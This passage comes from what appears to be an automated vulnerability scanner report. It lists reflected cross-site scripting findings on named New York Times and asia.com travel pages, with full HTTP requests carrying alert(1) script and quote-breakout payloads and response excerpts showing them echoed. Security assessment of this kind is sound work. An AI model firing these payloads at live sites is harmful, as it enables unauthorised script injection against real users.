X-Pingback: http://scientistatwork.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 65709

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
ert;New+York+Times;jungle;Madagascar;experiment;South+America;Arctic;scientist;expedition;Antarctica;explore;ecology;chameleon;natural+history;amazon;conservation;field-museum;nigel-pitman;peru&src=twrfc24e\"><script>alert(1)</script>92f6252037">
...[SNIP]...

3.260. http://scientistatwork.blogs.nytimes.com/2010/11/12/in-the-remote-pacific-glimpses-of-pristine-corals/ [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://scientistatwork.blogs.nytimes.com
Path:	/2010/11/12/in-the-remote-pacific-glimpses-of-pristine-corals/

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9fef4"><script>alert(1)</script>4150483ac40 was submitted in the src parameter. This input was echoed as 9fef4\"><script>alert(1)</script>4150483ac40 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/in-the-remote-pacific-glimpses-of-pristine-corals/?src=twr9fef4"><script>alert(1)</script>4150483ac40 HTTP/1.1
Host: scientistatwork.blogs.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 13 Nov 2010 02:37:57 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Vary: Cookie
X-Pingback: http://scientistatwork.blogs.nytimes.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr">
<head profile="http://gm
...[SNIP]...
mes;jungle;Madagascar;experiment;South+America;Arctic;scientist;expedition;Antarctica;explore;ecology;chameleon;natural+history;coral;fish;line-islands;pacific-ocean;palmyra-atoll;stuart-sandin&src=twr9fef4\"><script>alert(1)</script>4150483ac40">
...[SNIP]...

3.261. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://south-korea.travel.asia.com
Path:	/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 73173<a>119de2795e8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cheap-flights-country73173<a>119de2795e8/South-Korea/Search-South-Korea-Discount-Flights-And-Save HTTP/1.1
Host: south-korea.travel.asia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Last-Modified: Sat, 13 Nov 2010 02:38:15 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 13 Nov 2010 02:38:15 GMT
Date: Sat, 13 Nov 2010 02:38:15 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 63889

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta htt
...[SNIP]...
</a> > Cheap Flights Country73173<a>119de2795e8
<h2 class="PostHeaderIcon-wrapper">
...[SNIP]...

3.262. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://south-korea.travel.asia.com
Path:	/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f5784'-alert(1)-'530e8a7a41d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cheap-flights-countryf5784'-alert(1)-'530e8a7a41d/South-Korea/Search-South-Korea-Discount-Flights-And-Save HTTP/1.1
Host: south-korea.travel.asia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Last-Modified: Sat, 13 Nov 2010 02:38:14 GMT
Content-Type: text/html; charset=utf-8
Cache-Control: no-cache, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 13 Nov 2010 02:38:14 GMT
Date: Sat, 13 Nov 2010 02:38:14 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 64150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">

<head>
<meta htt
...[SNIP]...
t type="text/javascript">

var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-51381-1']);
_gaq.push(['_setDomainName', 'asia.com']);
_gaq.push(['_trackPageview','zzzzzzzzzz/cheap-flights-countryf5784'-alert(1)-'530e8a7a41d/South-Korea/Search-South-Korea-Discount-Flights-And-Savezz']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == documen
...[SNIP]...

3.263. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://south-korea.travel.asia.com
Path:	/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 25ad3<a>069c08e0a3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cheap-flights-country/South-Korea25ad3<a>069c08e0a3/Search-South-Korea-Discount-Flights-And-Save HTTP/1.1
Host: south-korea.travel.asia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

3.264. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://south-korea.travel.asia.com
Path:	/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5954"><a>798dc50e169 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cheap-flights-country/South-Koreae5954"><a>798dc50e169/Search-South-Korea-Discount-Flights-And-Save HTTP/1.1
Host: south-korea.travel.asia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Expires: Sat, 13 Nov 2010 02:38:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 13 Nov 2010 02:38:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=qodc4iupgrp6i260a1lbjfbh31; expires=Sat, 13 Nov 2010 12:38:23 GMT; path=/; domain=.asia.com
Content-Length: 35476

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link typ
...[SNIP]...
<meta name="description" content="Cheap Flights to South Koreae5954"><a>798dc50e169. Compare and Save on South-Koreae5954">
...[SNIP]...

3.265. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://south-korea.travel.asia.com
Path:	/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload febb6'-alert(1)-'5341485a6ff was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cheap-flights-country/South-Koreafebb6'-alert(1)-'5341485a6ff/Search-South-Korea-Discount-Flights-And-Save HTTP/1.1
Host: south-korea.travel.asia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Expires: Sat, 13 Nov 2010 02:38:37 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 13 Nov 2010 02:38:37 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=7s52tqi1hoaeb96jfihl6lu8e2; expires=Sat, 13 Nov 2010 12:38:36 GMT; path=/; domain=.asia.com
Content-Length: 35707

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link typ
...[SNIP]...
">
var _gaq = _gaq || [];
_gaq.push(['_setAccount', 'UA-51381-1']);
_gaq.push(['_setDomainName', 'asia.com']);
_gaq.push(['_trackPageview','SEMzzNewzzLandzz1Ozz0zz/cheap-flights-country/South-Koreafebb6'-alert(1)-'5341485a6ff/Search-South-Korea-Discount-Flights-And-Savezzzzf3yeu2x']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.l
...[SNIP]...

3.266. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://south-korea.travel.asia.com
Path:	/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 509bc<a>ab074ef237 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save509bc<a>ab074ef237 HTTP/1.1
Host: south-korea.travel.asia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Expires: Sat, 13 Nov 2010 02:38:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 13 Nov 2010 02:38:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=fp5942mg4nmg1mlktallqnclm0; expires=Sat, 13 Nov 2010 12:38:54 GMT; path=/; domain=.asia.com
Content-Length: 40371

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link typ
...[SNIP]...
" style="width:430px; color:#FFF; background:#FF0000; border:3px solid #FF0000; font-family:Arial, Helvetica, sans-serif; font-weight:bold; font-size:21px;">Search South Korea Discount Flights And Save509bc<a>ab074ef237</h2>
...[SNIP]...

3.267. http://south-korea.travel.asia.com/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://south-korea.travel.asia.com
Path:	/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1252d'-alert(1)-'a696df30fcf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save1252d'-alert(1)-'a696df30fcf HTTP/1.1
Host: south-korea.travel.asia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.9 (Fedora)
X-Powered-By: PHP/5.2.6
Content-Type: text/html; charset=UTF-8
Expires: Sat, 13 Nov 2010 02:38:54 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 13 Nov 2010 02:38:54 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: PHPSESSID=1blfh1819b8k460ggmir6m41i4; expires=Sat, 13 Nov 2010 12:38:53 GMT; path=/; domain=.asia.com
Content-Length: 40391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<link typ
...[SNIP]...
ccount', 'UA-51381-1']);
_gaq.push(['_setDomainName', 'asia.com']);
_gaq.push(['_trackPageview','SEMzzNewzzLandzz1Ozz0zz/cheap-flights-country/South-Korea/Search-South-Korea-Discount-Flights-And-Save1252d'-alert(1)-'a696df30fcfzzzzf3yeu2x']);

(function() {
var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true;
ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://ww
...[SNIP]...

3.268. http://theater.nytimes.com/2010/11/11/theater/reviews/11play.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://theater.nytimes.com
Path:	/2010/11/11/theater/reviews/11play.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f29ca"><script>alert(1)</script>8ac0424ea4b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/11/theater/reviews/11play.html?f29ca"><script>alert(1)</script>8ac0424ea4b=1 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:47 GMT
Content-type: text/html
Content-Length: 68739

...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/11/theater/reviews/11play.html?f29ca"><script>alert(1)</script>8ac0424ea4b=1&pagewanted=print">
...[SNIP]...

3.269. http://theater.nytimes.com/2010/11/11/theater/reviews/11play.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://theater.nytimes.com
Path:	/2010/11/11/theater/reviews/11play.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4901d"><script>alert(1)</script>145c10824b3 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/11/theater/reviews/11play.html?ref=todayspaper4901d"><script>alert(1)</script>145c10824b3 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:48 GMT
Content-type: text/html
Content-Length: 68956

...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/11/theater/reviews/11play.html?ref=todayspaper4901d"><script>alert(1)</script>145c10824b3&pagewanted=print">
...[SNIP]...

3.270. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [hpw parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://theater.nytimes.com
Path:	/2010/11/12/theater/reviews/12peewee.html

Issue detail

The value of the hpw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b39d2"><script>alert(1)</script>cd231d2e6c3 was submitted in the hpw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/theater/reviews/12peewee.html?hpwb39d2"><script>alert(1)</script>cd231d2e6c3 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:24 GMT
Content-type: text/html
Content-Length: 79431

...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html?hpwb39d2"><script>alert(1)</script>cd231d2e6c3&pagewanted=print">
...[SNIP]...

3.271. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://theater.nytimes.com
Path:	/2010/11/12/theater/reviews/12peewee.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cbe6"><script>alert(1)</script>e0ebad57850 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/theater/reviews/12peewee.html?5cbe6"><script>alert(1)</script>e0ebad57850=1 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:20 GMT
Content-type: text/html
Content-Length: 78591

...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html?5cbe6"><script>alert(1)</script>e0ebad57850=1&pagewanted=print">
...[SNIP]...

3.272. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://theater.nytimes.com
Path:	/2010/11/12/theater/reviews/12peewee.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload baacc"><script>alert(1)</script>15a1ee9d682 was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/theater/reviews/12peewee.html?src=mv&ref=homepagebaacc"><script>alert(1)</script>15a1ee9d682 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:29 GMT
Content-type: text/html
Content-Length: 74993

...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html?src=mv&ref=homepagebaacc"><script>alert(1)</script>15a1ee9d682&pagewanted=print">
...[SNIP]...

3.273. http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html [src parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://theater.nytimes.com
Path:	/2010/11/12/theater/reviews/12peewee.html

Issue detail

The value of the src request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39800"><script>alert(1)</script>06c62cb337d was submitted in the src parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/theater/reviews/12peewee.html?src=mv39800"><script>alert(1)</script>06c62cb337d&ref=homepage HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:28 GMT
Content-type: text/html
Content-Length: 78724

...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/12/theater/reviews/12peewee.html?src=mv39800"><script>alert(1)</script>06c62cb337d&ref=homepage&pagewanted=print">
...[SNIP]...

3.274. http://theater.nytimes.com/2010/11/12/theater/reviews/12radio.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://theater.nytimes.com
Path:	/2010/11/12/theater/reviews/12radio.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4360"><script>alert(1)</script>b35e521cc06 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/theater/reviews/12radio.html?e4360"><script>alert(1)</script>b35e521cc06=1 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:34 GMT
Content-type: text/html
Content-Length: 73582

...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/12/theater/reviews/12radio.html?e4360"><script>alert(1)</script>b35e521cc06=1&pagewanted=print">
...[SNIP]...

3.275. http://theater.nytimes.com/2010/11/12/theater/reviews/12radio.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://theater.nytimes.com
Path:	/2010/11/12/theater/reviews/12radio.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e40c2"><script>alert(1)</script>4c4bfb1960a was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/theater/reviews/12radio.html?ref=todayspapere40c2"><script>alert(1)</script>4c4bfb1960a HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:35 GMT
Content-type: text/html
Content-Length: 73498

...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/12/theater/reviews/12radio.html?ref=todayspapere40c2"><script>alert(1)</script>4c4bfb1960a&pagewanted=print">
...[SNIP]...

3.276. http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [hpw parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://theater.nytimes.com
Path:	/2010/11/12/theater/reviews/12throne.html

Issue detail

The value of the hpw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bf18"><script>alert(1)</script>e48fb82009c was submitted in the hpw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/theater/reviews/12throne.html?hpw2bf18"><script>alert(1)</script>e48fb82009c HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:33 GMT
Content-type: text/html
Content-Length: 76207

...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html?hpw2bf18"><script>alert(1)</script>e48fb82009c&pagewanted=print">
...[SNIP]...

3.277. http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://theater.nytimes.com
Path:	/2010/11/12/theater/reviews/12throne.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5e86"><script>alert(1)</script>e7c3b9810b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/theater/reviews/12throne.html?d5e86"><script>alert(1)</script>e7c3b9810b8=1 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:33 GMT
Content-type: text/html
Content-Length: 76202

...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html?d5e86"><script>alert(1)</script>e7c3b9810b8=1&pagewanted=print">
...[SNIP]...

3.278. http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html [ref parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://theater.nytimes.com
Path:	/2010/11/12/theater/reviews/12throne.html

Issue detail

The value of the ref request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ea66"><script>alert(1)</script>9e7ae8376cb was submitted in the ref parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/12/theater/reviews/12throne.html?ref=todayspaper6ea66"><script>alert(1)</script>9e7ae8376cb HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:34 GMT
Content-type: text/html
Content-Length: 76394

...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/12/theater/reviews/12throne.html?ref=todayspaper6ea66"><script>alert(1)</script>9e7ae8376cb&pagewanted=print">
...[SNIP]...

3.279. http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [hpw parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://theater.nytimes.com
Path:	/2010/11/13/theater/reviews/13notes.html

Issue detail

The value of the hpw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98792"><script>alert(1)</script>01a0c2a2969 was submitted in the hpw parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2010/11/13/theater/reviews/13notes.html?hpw98792"><script>alert(1)</script>01a0c2a2969 HTTP/1.1
Host: theater.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Sat, 13 Nov 2010 02:38:43 GMT
Content-type: text/html
Content-Length: 75094

...[SNIP]...
<a href="http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html?hpw98792"><script>alert(1)</script>01a0c2a2969&pagewanted=print">
...[SNIP]...

3.280. http://theater.nytimes.com/2010/11/13/theater/reviews/13notes.html [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://theater.nytimes.com
Path:	/2010/11/13/theater/reviews/13notes.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9dfee"><script>alert(1)</script>5d27ced1f19 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

